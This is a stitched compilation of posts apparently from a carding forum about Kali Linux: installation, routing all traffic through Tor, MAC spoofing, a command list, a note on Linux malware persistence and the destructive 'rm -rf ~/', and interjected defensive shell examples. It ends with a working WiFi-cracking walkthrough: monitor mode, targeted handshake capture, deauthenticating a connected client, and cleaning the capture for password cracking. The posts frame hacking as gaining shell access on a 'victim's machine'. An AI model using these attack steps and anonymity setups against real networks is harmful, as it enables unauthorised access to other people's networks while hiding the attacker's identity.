Kali Linux for newbies

Carder

This article is written for those who are just about to take their first steps.

Let's go!

Start

The first thing you need to do is get an 8 GB (minimum) USB flash drive.

Download Rufus (https://rufus.ie/); you will need it to write the image to the USB flash drive.

Then download the Kali Linux image: https://cdimage.kali.org/kali-2020.4/kali-linux-2020.4-installer-amd64.iso

Format the USB stick completely before starting the installation.

After you have successfully completed the steps above:

  • Open Rufus;
  • Click to select an .iso image;
  • Choose the previously downloaded Kali image;
  • Press "Start";
  • A window will appear; click "Yes" and select writing in "DD image" mode;
  • Wait for the write to finish and close Rufus.

You have created the installation flash drive. Moving on:

  • Reboot your PC;
  • Set the USB flash drive as the boot device in the BIOS, or just select it in the Boot Menu, which usually opens with F5, F8 or the Delete key;
  • Choose INSTALL (do not confuse it with Graphical install, we do not need that);
  • During installation, select disk encryption with LVM (you will need to come up with a password for encrypting the hard disk of at least 40-50 characters and keep it in your head).
You can install the system as the main one or alongside another OS.

You installed the system. Congratulations, let's move on:

After installation, create a root user with full access rights to the system:
  • Open the terminal (in the upper left corner there is a black square icon);

You can also open the terminal by pressing Ctrl + Alt + T (I advise you to open it this way).
  • Type in it: sudo su
  • Then: passwd root
  • Come up with a new password and enter it twice (the main thing is not to forget it, otherwise you will have to reinstall the system). The password is being typed even though it does not appear on the screen;
  • Next, restart your computer and log in as root with the new password.
Logged in as root? Fine!
  • Open a terminal and type: apt update
    With this command you will update application packages to the latest versions.
  • Then type: apt dist-upgrade
    With this command you will update the system itself.
If there are errors and the system does not update, do the following:

Open /etc/apt/sources.list manually.

The file should contain the following lines:

Code:
deb http://http.kali.org/kali kali-rolling main non-free contrib

# deb http://http.kali.org/kali kali-rolling main non-free contrib

If not, write them in manually and save.

There should be no problems now.

What is the Terminal in Kali Linux

Many people do not understand what the terminal in Kali Linux is or where it came from at all. A long time ago, in the 90s, to configure and administer a system, someone had to go to the terminal, log in and make the necessary changes.

It looked something like this.

[screenshot]

Try to imagine: you enter a room in which there is something that looks like a TV screen attached to a huge computer; this TV screen was called a terminal. Basically, the terminal was a display that showed the actions and the result of any command executed.

The display itself did not understand what you were entering or what you were doing; it was needed only to accept commands and show the result. Your actions were understood by the program running in the background. It understood what you typed and which keys you pressed, processed the received information and produced the result that was displayed on the terminal.

At that time, 2 components were needed: the physical screen itself, the terminal, plus the program that worked in the background.

On Linux, this program lives at /bin/bash.

Let's go and find this program, the one that understands what you type in the terminal.

To see it, select the file system on the desktop and walk down through the directories.

[screenshot]


Why am I telling you all this? Because in Linux, work happens exclusively in the terminal; you must understand this.

The terminal symbolizes the computer screen from the 90s. If you open a terminal, this program is already running in it. This is called a shell, and bash is what runs in it.

Press Ctrl + Alt + F1 and you will see a clean Linux system without a graphical interface (that was invented much later); you can work from there, as it was before. To go back, press Ctrl + Alt + F7.

Bash
runs in the terminal by default. Otherwise the terminal could not receive input and display the result. This shell processes commands in the background and sends the result back to the terminal for display.

It is much more efficient than the graphical user interface and, unlike it, is always available on servers. When you do hacks, you will often come across servers without a nice graphical interface, since it requires a lot of resources, disk space and RAM. Such costs are unaffordable for servers and must not affect performance.

In fact, servers always have a terminal, but no graphical interface. Therefore it is very important that you know how to navigate any Linux system using a terminal or shell. As a rule, when you hack something, your goal is to gain shell access on the remote machine, your victim's machine. This is done, for example, by a worm, botnet, stealer or rootkit.

File system

Now let's deal with directories or, as they are also called, folders. Open the file system on your desktop and find these directories. Now I will explain what is needed and why.

[screenshot]

There are no C: and D: drives and so on, familiar to Windows users. The Linux file system has a tree structure and is based on the root directory, denoted by the "/" symbol, under which all other directories live.

[screenshot]

Many people are stopped by the stereotype that Kali Linux is very difficult and you need to be a cool hacker. In fact, this is complete nonsense; there is nothing supernatural in this operating system, and after some time of use you will feel 10 times more comfortable in it than in Windows.

Now let's run all your traffic through the Tor network

  • Open the terminal and type: apt install tor (installs Tor itself). apt is the program that finds what you need to install, install is the command to install, and tor is the package to install;
  • systemctl start tor (this tells the service manager to start Tor so traffic can go through it);
  • git clone https://github.com/ruped24/toriptables2 (fetch the utility from GitHub);
  • cd toriptables2 (go into the folder with our utility);
  • Then type: mv toriptables2.py /usr/local/bin/
Now you can route all traffic through Tor with the commands:
Code:
toriptables2.py -l (enable);
toriptables2.py -f (disable).

Now let's make your MAC address change to a random one every time the system boots

First you need to install the leafpad text editor:

Code:
apt install leafpad

After it is installed, run:

Code:
leafpad /etc/NetworkManager/NetworkManager.conf

A text file will open.

At the end of this file add the following section and save:

Code:
[connection]
wifi.cloned-mac-address=random
ethernet.cloned-mac-address=random

The first key is for Wi-Fi, the second for wired connections.

After that, restart NetworkManager in the terminal:

Code:
service network-manager restart

Now your MAC address will change to a random one after every Kali boot.

Thank you all for your attention!
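An added example, not part of the post above and not the toriptables2 project's own code: it prints the iptables rule set that a "route everything through Tor" helper of that kind installs, so you can read what the -l switch is actually doing instead of running a script blind. It assumes /etc/tor/torrc contains VirtualAddrNetworkIPv4 10.192.0.0/10, AutomapHostsOnResolve 1, TransPort 9040 and DNSPort 5353, and that the tor daemon runs as the Debian/Kali user debian-tor; all of these are variables you can override.

```shell
#!/bin/sh
# Added example: generate (not apply) transparent-proxy rules for Tor.
# Assumed torrc settings: TransPort 9040, DNSPort 5353,
# VirtualAddrNetworkIPv4 10.192.0.0/10, AutomapHostsOnResolve 1.
# Assumed tor daemon user: debian-tor (Debian/Kali package default).

TOR_UID="${TOR_UID:-debian-tor}"
TRANS_PORT="${TRANS_PORT:-9040}"
DNS_PORT="${DNS_PORT:-5353}"
VIRT_NET="${VIRT_NET:-10.192.0.0/10}"
# Loopback, RFC1918 and link-local ranges that must NOT be pushed into Tor.
NON_TOR="127.0.0.0/8 10.0.0.0/8 172.16.0.0/12 192.168.0.0/16 169.254.0.0/16"

# tor_rules: print the rule set, one iptables command per line.
# Order matters: exemptions for tor itself and local nets come before
# the catch-all redirect, and the filter chain ends with a REJECT so that
# anything Tor cannot carry (UDP other than DNS, ICMP) is blocked, not leaked.
tor_rules() {
    echo "iptables -F"
    echo "iptables -t nat -F"
    # The tor process must reach the Internet directly, otherwise it loops.
    echo "iptables -t nat -A OUTPUT -m owner --uid-owner $TOR_UID -j RETURN"
    # Every DNS query goes to Tor's DNSPort: no cleartext resolver leak.
    echo "iptables -t nat -A OUTPUT -p udp --dport 53 -j REDIRECT --to-ports $DNS_PORT"
    echo "iptables -t nat -A OUTPUT -p tcp --dport 53 -j REDIRECT --to-ports $DNS_PORT"
    # .onion names are mapped into VIRT_NET by AutomapHostsOnResolve.
    echo "iptables -t nat -A OUTPUT -p tcp -d $VIRT_NET -j REDIRECT --to-ports $TRANS_PORT"
    for net in $NON_TOR; do
        echo "iptables -t nat -A OUTPUT -d $net -j RETURN"
    done
    # All remaining new TCP connections: transparent proxy via TransPort.
    echo "iptables -t nat -A OUTPUT -p tcp --syn -j REDIRECT --to-ports $TRANS_PORT"
    # Filter table: keep established flows, local nets and tor itself.
    echo "iptables -A OUTPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT"
    for net in $NON_TOR; do
        echo "iptables -A OUTPUT -d $net -j ACCEPT"
    done
    echo "iptables -A OUTPUT -m owner --uid-owner $TOR_UID -j ACCEPT"
    # Whatever was not redirected above would leave with your real IP: block it.
    echo "iptables -A OUTPUT -j REJECT"
}

# tor_rule_count: number of iptables commands tor_rules would emit.
tor_rule_count() {
    tor_rules | grep -c '^iptables'
}
```

Read the output first; `tor_rules | sudo sh` applies it. The last REJECT is the part worth understanding: UDP (other than DNS) and ICMP are dropped on purpose because Tor cannot carry them, which is exactly why tools like ping stop working while the rules are loaded. To return to normal networking, flush both tables (`iptables -F; iptables -t nat -F`), which is what the -f switch of the script above does.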
 

Carding 4 Carders


Kali Linux Commands from A to Z

Kali Linux is a Debian-based Linux distribution designed for digital forensics and penetration testing.
It is maintained and funded by Offensive Security Ltd. Mati Aharoni, Devon Kearns and Raphael Hertzog are the main developers.
Kali Linux has more than 600 penetration testing programs pre-installed, including nmap (port scanner), Wireshark (packet analyzer), John the Ripper (password cracker), Aircrack-ng (a suite of programs for penetration testing of wireless LANs), Burp Suite and OWASP ZAP (both web application security scanners).
Kali Linux can run natively when installed on the computer's hard disk, it can be booted from a live CD or USB storage device, or it can run in a virtual machine.
It supports the Metasploit Framework from the Metasploit Project, a tool for developing and executing security exploits.

All Kali Linux commands

Below we list the Kali Linux A-Z commands that will help simplify your work.
Command - Function
apropos - Search for man pages (man -k)
apt-get - Search for and install software packages (Debian)
aptitude - Search for and install software packages (Debian)
aspell - Spell check
awk - Find and replace text, sort/check/index a database
basename - Strip directory and suffix from a file name
bash - GNU Bourne-Again Shell
bc - Calculator
bg - Send to background
break - Break out of a loop
builtin - Run a shell builtin
bzip2 - Compress or decompress files
cal - Calendar
case - Conditionally execute a command
cat - Output (display) file contents
cd - Change directory
cfdisk - Partition table manipulator for Linux
chgrp - Change group ownership
chmod - Change access permissions
chown - Change file owner and group
chroot - Run a command with a different root directory
chkconfig - System services (runlevel)
cksum - Print the CRC checksum and byte count
clear - Clear the screen
cmp - Compare two files
comm - Compare two sorted files line by line
command - Run a command, ignoring shell functions
continue - Resume the next iteration of a loop
cp - Copy files
cron - Daemon for executing scheduled commands
crontab - Schedule a command to run at a later time
csplit - Split a file into context-determined parts
cut - Divide a file into several parts
date - Display or change the date and time
dc - Desk calculator
dd - Convert and copy a file, write disk headers, boot records
ddrescue - Data recovery tool
declare - Declare variables and assign attributes to them
df - Show free disk space
diff - Show differences between two files
diff3 - Show differences between three files
dig - DNS lookup
dir - Briefly list directory contents
dircolors - Colour setup for "ls"
dirname - Convert a full pathname to just a path
dirs - Show the list of remembered directories
dmesg - Print kernel and device messages
du - File space usage
echo - Display a message on screen
egrep - Search files for lines that match an extended expression
eject - Eject removable media
enable - Enable and disable builtin shell commands
env - Environment variables
ethtool - Ethernet card settings
eval - Evaluate several commands/arguments
exec - Execute a command
exit - Exit the shell
expect - Automate arbitrary applications accessed over a terminal
expand - Convert tabs to spaces
export - Set an environment variable
expr - Evaluate expressions
false - Do nothing, unsuccessfully
fdformat - Low-level format a floppy disk
fdisk - Partition table manipulator for Linux
fg - Send a job to the foreground
fgrep - Search files for lines that match a fixed string
file - Determine file type
find - Search for files that meet the given criteria
fmt - Reformat paragraph text
fold - Wrap text to fit a specified width
for - Loop expression
format - Format disks or tapes
free - Memory usage
fsck - Check and repair file system integrity
ftp - File Transfer Protocol client
function - Define function macros
fuser - Identify/kill the process that is accessing a file
gawk - Find and replace text in files
getopts - Parse positional parameters
grep - Search files for lines that match a given pattern
groupadd - Add a user group
groupdel - Delete a group
groupmod - Modify a group
groups - Print group names
gzip - Compress or decompress files
hash - Remember the full pathname of a name argument
head - Output the first part of files
help - Display help for a builtin command
history - Command history
hostname - Print or set the system name
iconv - Convert the character set of a file
id - Print user and group IDs
if - Conditional; part of a loop construct
ifconfig - Configure a network interface
ifdown - Stop a network interface
ifup - Start a network interface
import - Capture the X server screen and save the image to a file
install - Copy files and set attributes
jobs - List active jobs
join - Join lines on a common field
kill - Stop a process
killall - Kill processes by name
less - Display output one screen at a time
let - Perform arithmetic on shell variables
ln - Create a symbolic link to a file
local - Create variables
locate - Find files
logname - Print the current login name
logout - Exit a login shell
look - Display lines beginning with a given string
lpc - Line printer control
lpr - Off line print
lprint - Print a file
lprintd - Abort a print job
lprintq - List the print queue
lprm - Remove jobs from the print queue
ls - List information about files
lsof - List open files
make - Recompile a group of programs
man - Reference manual
mkdir - Create new directories
mkfifo - Create FIFOs (named pipes)
mkisofs - Create a hybrid ISO9660/JOLIET/HFS file system
mknod - Create block or character special files
more - Display output one screen at a time
mount - Mount a file system
mtools - Manipulate MS-DOS files
mtr - Network diagnostics (traceroute/ping)
mv - Move or rename files or directories
mmv - Mass move and rename files
netstat - Network information
nice - Set the priority of a command or job
nl - Number lines and write files
nohup - Run a command immune to hangups
notify-send - Send desktop notifications
nslookup - Query Internet name servers interactively
open - Open a file in its default application
op - Operator access
passwd - Change a user password
paste - Merge lines of files
pathchk - Check file name portability
ping - Test a network connection
pkill - Stop processes
popd - Restore the previous value of the current directory
pr - Prepare files for printing
printcap - Printer capability database
printenv - Print environment variables
printf - Format and print data
ps - Process status
pushd - Save and then change the current directory
pwd - Print working directory
quota - Display disk usage and limits
quotacheck - Scan a file system for disk usage
quotactl - Set disk quotas
ram - RAM disk device
rcp - Copy files between two machines
read - Read a line from standard input
readarray - Read from standard input into an array variable
readonly - Mark variables/functions as read-only
reboot - Reboot the system
rename - Rename files
renice - Alter the priority of running processes
remsync - Synchronize remote files via email
return - Exit a shell function
rev - Reverse lines of a file
rm - Remove files
rmdir - Remove directories
rsync - Remote file copy (synchronize file trees)
screen - Multiplex terminal, run remote shells via ssh
scp - Secure copy (remote file copy)
sdiff - Merge two files interactively
sed - Stream editor
select - Accept keyboard input
seq - Print numeric sequences
set - Manipulate shell variables and functions
sftp - Secure file transfer program
shift - Shift positional parameters
shopt - Shell options
shutdown - Shut down or restart Linux
sleep - Delay for a specified time
slocate - Find files
sort - Sort text files
source - Run commands from a file
split - Split a file into fixed-size pieces
ssh - Secure Shell client (remote login program)
strace - Trace system calls and signals
su - Substitute user identity
sudo - Execute a command as another user
sum - Print a checksum for a file
suspend - Suspend execution of this shell
symlink - Make a new name for a file
sync - Synchronize data on disk with memory
tail - Output the last part of a file
tar - Tape archiver
tee - Redirect output to multiple files
test - Evaluate a conditional expression
time - Measure program running time
times - User and system times
touch - Change file timestamps
top - List processes running on the system
traceroute - Trace the route to a host
trap - Run a command when a signal is set (Bourne)
tr - Translate, squeeze and/or delete characters
true - Do nothing, successfully; part of a loop construct
tsort - Topological sort
tty - Print the file name of the terminal on standard input
type - Describe a command
ulimit - Limit user resources
umask - User file creation mask
umount - Unmount a device
unalias - Remove an alias
uname - Print system information
unexpand - Convert spaces to tabs
uniq - Uniquify files
units - Convert units from one scale to another
unset - Remove variable or function names
unshar - Unpack shell archive scripts
until - Execute commands (until error); part of a loop construct
uptime - Show system uptime
useradd - Create a new user account
usermod - Modify a user account
users - List users currently logged in
uuencode - Encode a binary file
uudecode - Decode a file created by uuencode
v - Verbosely list directory contents ('ls -l -b')
vdir - Verbosely list directory contents ('ls -l -b')
vi - Text editor
vmstat - Report virtual memory statistics
wait - Wait for a process to complete; part of a loop construct
watch - Execute/display a program periodically
wc - Print byte, word and line counts
whereis - Search the user's path, man pages and source files for a program
which - Search the user's path for a program file
who - Print all user names currently logged in
whoami - Print the current user id and name ('id -un')
wget - Retrieve web pages or files via HTTP, HTTPS or FTP
write - Send a message to another user
xargs - Execute a utility, passing constructed argument lists
xdg-open - Open a file or URL in the user's preferred application
yes - Print a string until interrupted
 

Carding


Kali Linux


Kali Linux is one of the Linux distributions designed for hackers and information security professionals. So it is not surprising that this raises its popularity, and many newbies and people without any knowledge of information security try to use this distribution as their main system. But Kali Linux is not designed for this at all. In today's article we will look at what Kali Linux is and why you need it, and give an overview of Kali Linux.

1. Development history
Kali Linux was developed by the security firm Offensive Security. It was created on the basis of Debian and contains the work done on BackTrack, the distribution for digital forensics and security testing.
The first version of BackTrack was released in 2006; it combined several projects whose main purpose was penetration testing. The distribution was intended to be used as a LiveCD.
In 2012, BackTrack as a distribution ceased to exist, and Kali Linux appeared instead, taking over all the advantages of the previous version and all the software. It was the result of the merger of two projects: WHAX and the Auditor Security Collection. Now the distribution is developing steadily, and the developers' efforts are aimed at fixing bugs and expanding the set of tools.

2. Purpose
The official website describes the distribution as a "Penetration Testing and Ethical Hacking Linux Distribution", that is, a distribution for penetration testing and ethical hacking. Simply put, this distribution contains many security and networking tools aimed at computer security experts.
A Linux distribution is nothing more than a kernel plus a set of basic utilities, applications and defaults. Kali Linux does not provide anything unique in this regard. Most of the programs can easily be installed on any other distribution, or even on Windows.
The difference with Kali Linux is that it is filled with tools and settings needed for security testing, not for the normal work of the average user. If you want to use Kali instead of a mainstream distribution, you are making a mistake. This is a specialized distribution for solving a certain range of tasks, which means that solving tasks it was not intended for will be harder, for example something as simple as searching for programs. Kali Linux's capabilities are focused on security testing.

3. Installation
You can download the installation image from the official website; you only need to choose the architecture. After downloading, be sure to check the image for corruption by comparing its SHA256 checksum. Since this distribution is intended for security testing, I really don't want it to be broken in any way.

4. Features
Many will be surprised, but the default user in Kali Linux is root. This is necessary because many programs need superuser rights to run. This is one of the reasons why you should not use Kali for everyday tasks like surfing the Internet or using office applications.
As for software, all the supplied programs are focused on security. There are graphical programs and terminal commands, and a few basic utilities are included in the system, such as an image viewer, a calculator and a text editor. But you will not find office programs, e-readers, email clients or organizers here.

[screenshot]

Kali Linux is based on Debian, and nothing prevents you from installing a program from the repositories, for example Thunderbird for reading mail. But reading mail as the superuser is not a good idea. Of course, nobody stops you from creating an unprivileged user, but this is extra work.
On the Kali Linux login screen you can see the motto "The quieter you become, the more you are able to hear". If you watch the packets a Debian system sends to the network, you will notice that some packets go out regularly. Some of them are sent by user applications, others by background services.
For example, if you scan your Linux machine with Nmap, you may see several open ports. These could be, for example, a never-used VNC port and an HTTP server. Some of these programs come by default, some you installed and forgot.
Kali Linux strives to be as quiet as possible. This is necessary to hide your presence in the attacked network and to protect yourself from potential attacks. To achieve this, many services that are enabled by default in Debian are disabled in Kali. Of course, you can install the service you want from the Debian repositories.

For example apache2:
[screenshot]

However, after that the service will not start automatically and will not be added to startup. If you need it, you will have to start it manually. On each reboot, all unnecessary services are disabled. It is possible to get around this and add the service to the /usr/sbin/update-rc.d whitelist, but this is not entirely secure, since you are opening a path into the system. Nobody knows whether there are any vulnerabilities.
Kali Linux is a specialized distribution, if only because it is designed to work in a hostile environment. And if you install a web server and a few other programs and add them to startup, you may have already broken Kali and reduced its security.

5. Programs
As stated above, the Kali Linux distribution contains only specific security testing software. Many of the programs needed for everyday work are missing, and there is no guarantee that you will find them in the repositories even if they are available in Debian.
You may want to add third-party repositories and application sources to install what you need, or add a repository that contains the latest version of a program. You can, but you should not. Even for Debian this is not recommended; the developers call the result FrankenDebian and say that it can break the stability of the system.
With Kali Linux it is even more complicated. You risk not only damaging the system but also making it insecure. Packages from the repositories have been checked and contain additional changes; for example, the same Apache is not added to startup. Third-party packages will not have such precautions.
We will talk about the software in a separate article, because it is impossible to describe hundreds of unique tools in one article without getting confused.

Conclusions
Our review of Kali Linux features is coming to an end. Whether you should choose this distribution or not depends on you and the tasks you are trying to solve with the system. If you only need a few tools, it is better to choose a simpler distribution, for example Ubuntu or Debian; you will be able to install all the necessary tools there. The same option is better for new users.
But if you already know Linux well and are ready to spend a lot of time understanding information security, this system may be for you. But do not rush to install it on your computer. Use a virtual machine, then install it as a secondary, second system.
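An added example, not part of the post above: the SHA256 check the post recommends in section 3, done with coreutils only. It assumes the ISO sits next to a SHA256SUMS file in the format the Kali download site publishes ("hash  filename", one line per image); the filenames used in the test are constructed.

```shell
#!/bin/sh
# Added example: verify a downloaded ISO against its published SHA256SUMS entry.
# Assumes SHA256SUMS lines look like "<hex>  <filename>" or "<hex> *<filename>".

# verify_iso ISO SUMSFILE
# Returns 0 when the hash of ISO matches its own entry in SUMSFILE, 1 otherwise
# (including when SUMSFILE has no entry for that filename at all).
verify_iso() {
    iso="$1"; sums="$2"
    name=$(basename "$iso")
    # Select only this image's line; a matching hash on some other line
    # (or an empty file) must not be mistaken for success.
    expected=$(awk -v n="$name" '$2 == n || $2 == "*" n { print $1; exit }' "$sums")
    if [ -z "$expected" ]; then
        echo "no entry for $name in $sums" >&2
        return 1
    fi
    actual=$(sha256sum "$iso" | awk '{ print $1 }')
    if [ "$actual" = "$expected" ]; then
        echo "OK: $name"
        return 0
    fi
    echo "MISMATCH: $name expected $expected got $actual" >&2
    return 1
}
```

Usage: `verify_iso kali-linux-2020.4-installer-amd64.iso SHA256SUMS`. The checksum only protects against a corrupt download; whoever can swap the ISO on a mirror can swap SHA256SUMS too, so first verify the detached signature that Kali ships next to it (`gpg --verify SHA256SUMS.gpg SHA256SUMS`) against the Kali archive signing key, and only then trust the hash list.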
 

Hacker

Linux security

Configuring Linux.
You can often come across the opinion that Linux is secure. So far this is really true: no one has made a particularly thorough effort to create attack programs, which is why the illusion of security is created. However, let's try to pay attention in advance to those things in a Linux system that may interest intruders in the future.
This article does not pretend to be a complete overview of the problems; I just want to outline the contours of a problem that already exists but is not yet particularly solved. Some of the described security methods can be made to work right now, and some should be implemented by the authors of the system software.
Update: for some reason the general idea of the article turned out to be incomprehensible to some readers, so I will state it explicitly: the idea is to show some specific examples of the use of known attacks (if you can call them "attacks", of course) in a Linux environment.
It makes no sense to talk about methods of penetration; malicious software will leak into any system anyway.

Autostart
So, a virus is in the system: for example, through a hole in libflash it launched a downloaded binary; to survive, it needs to register itself in autostart.
We won't even talk about such a small thing as masking the virus name in the process list. The virus can easily impersonate anything.
In addition to the DE's tools, there are various startup scripts such as ~/.xsession, ~/.profile or ~/.zshrc. If you really want to, you can probably even put something destructive in ~/.fonts.conf.
How to fight this? No way. While there are no reliable control tools, nobody (among the software authors) really bothers with the mess in the scripts. A paranoid solution is to take hash sums of critical user config files and store them in a place the user cannot modify. Then, at startup, check all the hash sums.

Disguise
In addition to registering itself in autostart, the virus can add a lot of information useful to it to its configuration files. One of the most attractive targets can be the PATH environment variable. Let me remind you that this variable stores the list of paths that will be searched for an executable program. Usually PATH looks something like /usr/bin:/bin, and the virus can modify it to ~/bin:/usr/bin:/bin. This means that a program typed without its full path will first be searched for in the user's directory, and only then in the system ones.
The solution? Use only full paths when running programs. However, this is not guaranteed protection. A more reliable solution would be to restrict modification of critical environment variables.

Sabotage
Everything here is quite sad. As a rule, one command, rm -rf ~/, is enough to cause maximum damage. After that you can say goodbye to all your data.
Also, nothing prevents it from encrypting all the data in the home directory, as some Windows viruses do.
More minor sabotage is also possible, for example writing all sorts of rubbish into browser configs (spoofing the home page, for example). It is impossible to deal with this centrally; application authors should take care of it.
Undoubtedly, the standard location of application profiles makes life much easier for attackers. For example, the Opera profile will almost always be in the ~/.opera directory. So you can partially protect yourself by changing the standard profile paths. Many applications allow you to do this.

Conclusions
Decent security requires a fair amount of paranoia. A system for monitoring running applications (comparing hash sums of executables and scripts) can significantly complicate a virus's life. You can prevent it from "settling" on a disk by prohibiting writes to that disk. At the same time, you still need to provide some way to modify the configuration files.
The described methods and options are just what comes to mind when you try to think about the problem. Surely there are other, particularly refined methods (such as using ~/.fonts.conf), but that is enough to start with. Yet software manufacturers, including system ones, do not think much about such primitive everyday safety issues. They should.
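An added example, not part of the post above: the two defences the post sketches, written as plain sh functions. path_hijack_risk flags a PATH that searches a user-controlled directory (the post's ~/bin:/usr/bin:/bin case, a relative or empty entry) before the first system directory; dotfile_baseline and dotfile_verify record SHA-256 sums of a user's startup files and report any that changed, the "store the hashes where the user cannot modify them" idea. Which files count as startup files and where the baseline is kept are assumptions passed in as arguments.

```shell
#!/bin/sh
# Added example: PATH-order check and startup-file integrity baseline.

# path_hijack_risk PATHSTRING HOME
# Prints every PATH entry that is under HOME, relative, or empty (the shell
# treats "" and "." as the current directory) and that comes BEFORE the first
# system directory. Returns 1 if any such entry exists, 0 if the order is clean.
path_hijack_risk() {
    pathstr="$1"; home="$2"; rc=0; seen_system=0
    old_ifs=$IFS; IFS=:
    for d in $pathstr; do
        case "$d" in
            /usr/*|/bin|/sbin|/bin/*|/sbin/*) seen_system=1 ;;
            ""|.|"$home"|"$home"/*|"~"|"~"/*)
                if [ "$seen_system" -eq 0 ]; then
                    echo "user-controlled PATH entry before system dirs: '${d:-<empty>}'"
                    rc=1
                fi ;;
        esac
    done
    IFS=$old_ifs
    return $rc
}

# dotfile_baseline BASELINE_FILE FILE...
# Writes "sha256  path" lines for each FILE that exists. Keep BASELINE_FILE
# somewhere the user cannot write (e.g. a root-owned directory), otherwise
# the malware can simply re-baseline after editing ~/.profile.
dotfile_baseline() {
    out="$1"; shift
    : > "$out"
    for f in "$@"; do
        if [ -f "$f" ]; then
            sha256sum "$f" >> "$out"
        fi
    done
}

# dotfile_verify BASELINE_FILE
# Returns 0 if every recorded file still has its recorded hash, 1 if any
# changed or disappeared; --quiet prints only the failures.
dotfile_verify() {
    sha256sum --check --quiet "$1"
}
```

A realistic call from a login script: `path_hijack_risk "$PATH" "$HOME"` followed by `dotfile_verify /var/lib/dotfile-baseline/$USER.sha256`, with the baseline regenerated only by root after a deliberate change. The check catches modification of files that already exist; a new ~/.config/autostart/*.desktop entry is only caught if that directory's files were included in the baseline list, so list whole autostart directories, not just the classic dotfiles.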
 

Mutt

Kali Linux is not a Linux for beginners but a powerful weapon of the hacker, or of the one who fights those hackers. Kali Linux is a superb penetration testing and security auditing distribution.

Kali Linux is a descendant of the famous BackTrack Linux, but it is now based on Debian and accordingly supports its packages in general and applications in particular.

What is Kali Linux?
Kali Linux, of course, has its own official website, and the best part is that there is documentation too, so you don't need to know English to understand all the intricacies of this OS. And since the functionality of Kali Linux is huge, you will just have to read the manuals.

What does Kali Linux look like in general? This is probably the first thing everyone pays attention to, because, as they say, you are greeted by your clothes...

What is also very interesting and important is the fact that Kali Linux has been ported to the ARM architecture, which means it can safely be installed on a tablet. The site has detailed instructions on how to build your own image for ARM. I have noticed for a long time that more and more Linuxes are porting their builds to ARM, since all mobile devices today use this particular architecture.

Here it is, Kali Linux, great and terrible, a favourite of hackers and system administrators!

How to hack WiFi using Kali Linux?
First, we check the available network interfaces. This can be done with the command:
Code:
iwconfig

In this case you will see a similar picture:
[screenshot]


In this case there are 2 available network interfaces: wlan0mon (more about monitor mode a little later) and wlan1 (wlan0).

After this step, there are several possible paths:
  • The way is simpler and for the lazy: use the wifite utility
  • Do everything with pens and yourself

In the first case, you only need:
- select the device from which to carry out the attack (network interface)
- select the attacked network
- then the utility will do everything by itself: it will either capture a handshake if you attack a WPA network without WPS, or it will attack using Pixie if WPS is enabled.
- in the case of WPA, Wifite can be launched by specifying the dictionary that it will use to crack the handshake (wifite –dict wordlist.txt).

When we made sure that the Wi-Fi adapter is connected and working, we need to find out the signal of which networks it catches, one of the options, turn on the wireless interface and scan.

To do this, we will use the following commands:
ifconfig wlan1 up - in this case wlan1 is the name of the network interface
iwlist wlan1 scanning - scanning using the wlan1 interface
and we get something like this:
[screenshot: iwlist scan output]


We are interested in three parameters:
the network name (ESSID), the MAC address of the access point (BSSID), and the channel.

Now let's capture a handshake. For this we need to put the network interface into monitor mode and then listen for the handshake.

To switch to monitor mode use the command:
Code:
airmon-ng start wlan1
Here the interface is renamed to wlan1mon and put into monitor mode (you can check this with iwconfig). airmon-ng may warn that some processes (typically NetworkManager and wpa_supplicant) could interfere; this is normal. If they keep resetting the adapter, stop them with airmon-ng check kill before starting monitor mode, bearing in mind that this disconnects you from any Wi-Fi network until they are restarted.
[screenshot: airmon-ng output]


For a more targeted capture of the handshake we use the information from the scan:
Code:
airodump-ng wlan0mon --bssid FC:8B:97:57:97:A9 --channel 2 --write handshake --wps
wlan0mon - the monitor-mode interface (use the name airmon-ng printed; in the example above it would be wlan1mon)
--bssid FC:8B:97:57:97:A9 - MAC address of the router we are attacking
--channel 2 - lock the adapter to the channel the router uses (otherwise airodump-ng keeps hopping between channels and misses frames)
--write handshake - write the captured frames to files named handshake-01.cap, handshake-02.cap and so on
--wps - shows whether WPS is enabled on the access point, in case you missed it earlier
[screenshot: airodump-ng capture]


This is what the handshake capture looks like.
Since a handshake happens when a client connects to an access point, we either wait for a client to connect (for example, someone coming home or to the office, or turning on a laptop or its Wi-Fi) or force an already connected client to reconnect with deauthentication and capture the handshake when it comes back. Run the deauthentication from a second terminal while airodump-ng keeps running on the same channel. An example of deauthentication:
Code:
aireplay-ng -0 10 -a FC:8B:97:57:97:A9 -c 68:3E:34:15:39:9E wlan0mon
-0 - deauthentication attack
10 - number of deauthentication bursts to send (0 means send forever)
-a FC:8B:97:57:97:A9 - MAC address of the access point
-c 68:3E:34:15:39:9E - MAC address of the client (omit it to deauthenticate all clients of the access point)
wlan0mon - interface used

When a handshake is captured, airodump-ng shows "WPA handshake: <BSSID>" in the top right corner of its window.
[screenshot: airodump-ng showing "WPA handshake"]


Now that we have caught a handshake, it is advisable to check it, clean it of everything unnecessary, and only then guess the password.

You can check in several ways:

1) using the cowpatty utility
Code:
cowpatty -r handshake-01.cap -c
-r - the capture file to check
-c - check whether the file contains a valid handshake instead of cracking it
[screenshot: cowpatty output]


As we can see in the screenshot, the first file did not contain a valid handshake, but the second did.

2) Using Wireshark
To do this, open the file in Wireshark, either from the terminal (wireshark handshake-01.cap) or through the menu. You will see a large number of packets. Filter out the handshake packets with the filter:
Code:
eapol || wlan.fc.type_subtype == 0x04 || wlan.fc.type_subtype == 0x08
and click Apply. (eapol matches the EAPOL-Key frames of the 4-way handshake; 0x08 is the beacon frame, which carries the network name; 0x04 is the probe request.)

Now we need to keep one beacon of the access point and the first two handshake packets (messages 1 and 2 of the 4-way handshake: the first carries the access point's nonce, the second carries the client's nonce and the MIC that every password guess is checked against) and remove everything else. Make sure the frame numbers of those two packets are close together, so that they come from the same handshake and not from two different connection attempts.
[screenshot: Wireshark with the handshake filter applied]


In this case you can select the beacon and the first two handshake packets and save them separately.

3) the easiest way is the wpaclean utility.
Code:
wpaclean wpacleaned.cap handshake-01.cap
Note the argument order: the output file comes first and the source capture second (wpaclean <out.cap> <in.cap> [in2.cap ...]); swapping them would overwrite your capture with an empty result.
wpacleaned.cap - the file the cleaned handshake will be written to
handshake-01.cap - the source file the handshake is taken from
[screenshot: wpaclean output]


As we can see, the program's output differs between the two files; this is because the first file did not contain all the necessary information.

Now that we have a correct, cleaned handshake, all that remains is to crack it.

